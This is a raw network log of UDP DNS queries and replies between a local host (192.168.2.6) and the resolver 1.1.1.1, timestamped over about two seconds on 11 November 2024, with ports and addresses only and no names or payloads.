Nov 11, 2024 18:13:19.005948067 CET	49628	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.006078959 CET	51205	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.006220102 CET	58536	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.006361961 CET	57239	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.006561995 CET	52939	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.006695986 CET	57330	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.006910086 CET	51327	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.007074118 CET	61658	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.007217884 CET	54682	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.007356882 CET	59107	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.007487059 CET	53596	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.007641077 CET	54451	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.007791996 CET	55465	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.007921934 CET	49843	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.008071899 CET	63068	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.008212090 CET	57000	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.008344889 CET	53841	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.008550882 CET	54746	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.008758068 CET	60782	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.010090113 CET	53	65343	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.010407925 CET	53	64575	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.010988951 CET	53	60513	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.011143923 CET	53	53525	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.012389898 CET	53	52558	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.013072014 CET	53	58042	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.013088942 CET	53	65445	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.013705015 CET	63042	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.013941050 CET	58267	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.014976025 CET	61578	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.015901089 CET	58265	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.016104937 CET	53	57239	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.016149044 CET	53	51205	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.016285896 CET	53	52939	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.016407013 CET	50991	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.016416073 CET	53	62498	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.016829014 CET	53	58536	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.016911983 CET	53	53596	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.017138004 CET	53	54451	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.017322063 CET	53	51327	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.017565966 CET	53	54682	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.017874002 CET	53	49843	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.018465042 CET	53	57000	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.019336939 CET	53	63068	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.023787975 CET	53	63042	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.025197029 CET	53	57330	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.032903910 CET	53	56161	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.033236027 CET	53	51787	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.037342072 CET	53	60508	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.037636995 CET	53	61658	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.037878036 CET	53	49628	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.038613081 CET	53	55465	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.038752079 CET	53	59107	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.039607048 CET	53	53841	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.039618969 CET	53	60782	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.040632963 CET	53	54746	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.043648005 CET	56709	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.045736074 CET	53	58267	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.046149969 CET	53	61578	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.046969891 CET	53	58265	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.047802925 CET	53	50991	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.053527117 CET	53	56709	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.587090969 CET	56776	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.588407993 CET	55690	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.589355946 CET	56380	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.589879036 CET	61845	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.590614080 CET	61680	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.591537952 CET	61500	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.592168093 CET	49671	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.592746019 CET	65035	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.594424963 CET	49773	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.595309019 CET	65449	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.596435070 CET	59352	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.598148108 CET	53	55690	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.598180056 CET	65328	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.599354029 CET	56191	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.599407911 CET	53	56380	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.600624084 CET	53	61680	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.602087975 CET	50040	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.602128029 CET	53	61500	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.602781057 CET	53	65035	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.604352951 CET	53	49773	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.604391098 CET	57299	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.606216908 CET	53	65449	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.606467962 CET	56451	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.607089996 CET	54537	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.609632969 CET	53	56191	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.613518000 CET	53	57299	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.616146088 CET	56256	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.616766930 CET	53	56451	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.617301941 CET	53	54537	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.617929935 CET	53	56776	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.620579004 CET	53	61845	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.623691082 CET	53	49671	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.625758886 CET	53	56256	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.627140999 CET	53	59352	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.630466938 CET	53	65328	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.632394075 CET	53	50040	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.663487911 CET	58980	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.663676977 CET	62103	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.663973093 CET	63975	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.665519953 CET	56535	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.668554068 CET	54750	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.673238039 CET	53	62103	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.673340082 CET	65085	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.673340082 CET	52076	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.673648119 CET	61527	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.674959898 CET	53	63975	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.675338984 CET	49386	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.676750898 CET	55758	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.679373980 CET	53	54750	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.680047035 CET	53	65085	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.681298018 CET	49908	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.681509972 CET	53	58980	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.681543112 CET	50752	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.681823015 CET	58542	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.683926105 CET	53	61527	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.684943914 CET	53	49386	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.685739040 CET	60782	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.686079979 CET	58778	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.686430931 CET	53465	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.686430931 CET	63078	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.686728001 CET	63113	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.687000990 CET	50471	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.687166929 CET	52361	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.687342882 CET	63569	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.687530041 CET	51421	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.692348957 CET	62370	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.692548037 CET	53012	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.692548037 CET	60838	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.692682981 CET	57113	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.692703962 CET	53	49908	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.692828894 CET	50897	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.692828894 CET	55819	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.692997932 CET	65509	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.694839001 CET	57160	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.694958925 CET	53197	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.695445061 CET	53	56535	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.695718050 CET	53	55758	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.695735931 CET	53	58778	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.696712017 CET	53	53465	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.697189093 CET	53	52361	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.698446035 CET	53	51421	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.699491978 CET	53	63113	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.699503899 CET	53	50752	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.699517965 CET	53	62370	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.699640036 CET	53	55819	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.702456951 CET	53	50897	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.702549934 CET	53	53012	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.702749014 CET	52908	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.702852011 CET	56670	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.703107119 CET	52409	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.703107119 CET	59466	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.703202963 CET	58441	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.704376936 CET	55468	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.704905033 CET	62612	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.705060959 CET	50528	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.705252886 CET	53	52076	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.705277920 CET	63684	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.705403090 CET	53451	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.705751896 CET	60822	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.705751896 CET	63669	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.706665039 CET	49667	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.707174063 CET	61164	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.707679987 CET	53	53197	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.709225893 CET	57543	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.712209940 CET	53	58542	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.712291002 CET	53	52908	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.717082977 CET	53	59466	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.717118979 CET	53	52409	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.717159033 CET	53	56670	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.717263937 CET	53	58441	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.717286110 CET	53	53451	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.717297077 CET	53	63684	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.717530012 CET	53	63669	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.717544079 CET	53	60782	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.717555046 CET	53	61164	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.717667103 CET	53	63078	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.719280958 CET	53	50471	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.719294071 CET	53	63569	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.723707914 CET	53	65509	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.724256039 CET	53	60838	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.724529982 CET	53	57543	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.726557970 CET	53	57160	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.736105919 CET	53	50528	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.736381054 CET	53	55468	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.736473083 CET	53	60822	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.736754894 CET	53	62612	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.739237070 CET	53	49667	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.915716887 CET	53	57113	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.618684053 CET	59093	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.619395018 CET	61119	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.620013952 CET	64510	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.621299982 CET	49278	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.624954939 CET	64361	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.628607988 CET	53	59093	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.629441023 CET	53	61119	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.631176949 CET	53	64510	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.634982109 CET	57552	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.636210918 CET	53	64361	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.636842966 CET	55684	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.639591932 CET	50056	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.643301964 CET	58147	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.644521952 CET	53	57552	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.645035028 CET	54185	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.647402048 CET	53	55684	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.649049044 CET	49564	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.649630070 CET	56406	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.649672031 CET	53	50056	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.650126934 CET	54986	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.652508974 CET	52393	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.652761936 CET	53	49278	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.652892113 CET	53	58147	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.658910990 CET	53	49564	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.662765980 CET	53	52393	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.668382883 CET	53	54986	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.673523903 CET	57663	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.674518108 CET	50593	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.674673080 CET	64242	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.675462961 CET	53	54185	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.676588058 CET	62275	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.677191973 CET	58711	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.677731037 CET	62537	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.681488037 CET	55634	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.681719065 CET	61665	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.681890965 CET	53	56406	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.682128906 CET	60189	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.682281017 CET	64280	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.684179068 CET	63323	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.684271097 CET	53	50593	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.686289072 CET	53	62275	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.686477900 CET	53	64242	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.687968016 CET	49306	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.688148975 CET	55694	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.690109968 CET	53	64280	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.690989971 CET	53	55634	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.691435099 CET	51461	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.693393946 CET	60386	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.693624020 CET	57693	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.694351912 CET	53	63323	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.694818974 CET	63816	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.694983006 CET	56312	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.695797920 CET	63718	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.696156025 CET	53	58711	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.696161032 CET	59108	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.696902990 CET	53	49306	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.697710037 CET	63965	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.697932959 CET	53	55694	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.698121071 CET	61100	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.698900938 CET	54649	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.699640036 CET	64053	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.702440977 CET	52431	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.703892946 CET	53	60386	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.704049110 CET	53	63816	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.704356909 CET	53	57663	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.704488039 CET	53	56312	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.708496094 CET	53	62537	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.708710909 CET	53	54649	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.709572077 CET	53	64053	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.712023973 CET	53	52431	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.712946892 CET	53	61100	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.713071108 CET	53	60189	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.714345932 CET	53	61665	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.715711117 CET	64756	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.716809988 CET	59516	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.718575954 CET	63012	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.719157934 CET	50921	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.719912052 CET	52531	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.721678019 CET	61347	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.722029924 CET	49968	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.722559929 CET	53	51461	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.723270893 CET	57409	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.724714041 CET	53	57693	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.725675106 CET	58288	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.726983070 CET	53	63718	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.727516890 CET	53	63012	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.728080988 CET	53	59108	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.730019093 CET	53	63965	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.730751038 CET	53	61347	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.731642962 CET	53	49968	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.732678890 CET	53	50921	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.733674049 CET	53	57409	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.733778954 CET	53	64756	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.735491991 CET	53	58288	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.738938093 CET	53	52531	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.744380951 CET	53619	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.744477034 CET	55649	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.748228073 CET	53	59516	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.750869989 CET	56372	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.754780054 CET	53	55649	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.755729914 CET	53	53619	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.762075901 CET	53	56372	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.788187027 CET	60465	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.797265053 CET	54725	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.797411919 CET	58785	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.798607111 CET	53	60465	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.804205894 CET	51802	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.804536104 CET	62031	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.804744959 CET	55497	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.804950953 CET	65102	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.805144072 CET	51562	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.805373907 CET	51353	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.805681944 CET	60480	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.807254076 CET	53	58785	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.807256937 CET	63836	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.807320118 CET	53	54725	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.807903051 CET	63573	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.813240051 CET	59070	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.814115047 CET	53	55497	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.814156055 CET	53	51802	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.814173937 CET	53	62031	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.814364910 CET	53	51353	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.818027020 CET	53	63836	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.822894096 CET	53	51562	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.824137926 CET	53	59070	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.827239990 CET	53	63573	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.837289095 CET	53	65102	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.839277983 CET	53	60480	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.889525890 CET	64253	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.890407085 CET	57037	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.893543959 CET	57281	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.900305033 CET	53	64253	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.905255079 CET	55586	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.910523891 CET	61973	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.914740086 CET	53	55586	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.920259953 CET	53	61973	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.921456099 CET	49960	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.921715975 CET	53	57037	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.924056053 CET	53	57281	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.929848909 CET	55305	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.930428028 CET	63008	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.930629969 CET	55259	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.940082073 CET	53	63008	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.948175907 CET	63596	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.948508978 CET	59564	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.948821068 CET	53	55259	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.948879004 CET	49659	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.949192047 CET	64950	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.951766014 CET	59493	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.953075886 CET	51997	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.955271006 CET	53	49960	1.1.1.1	192.168.2.6
